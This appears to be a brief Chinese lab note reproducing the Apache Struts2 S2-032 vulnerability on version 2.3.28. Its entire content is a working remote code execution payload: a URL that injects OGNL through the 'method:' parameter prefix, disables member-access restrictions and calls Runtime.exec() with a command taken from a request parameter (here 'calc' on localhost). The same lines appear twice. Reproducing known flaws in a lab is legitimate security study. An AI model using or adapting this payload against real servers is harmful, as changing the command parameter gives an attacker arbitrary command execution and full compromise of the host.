s2_032 重现(调用服务器的计算器)
测试版本2.3.28
http://localhost/hehe.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]),1?%23xx:%23request.toString&command=calc
s2_032 重现(调用服务器的计算器)
测试版本2.3.28
http://localhost/hehe.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]),1?%23xx:%23request.toString&command=calc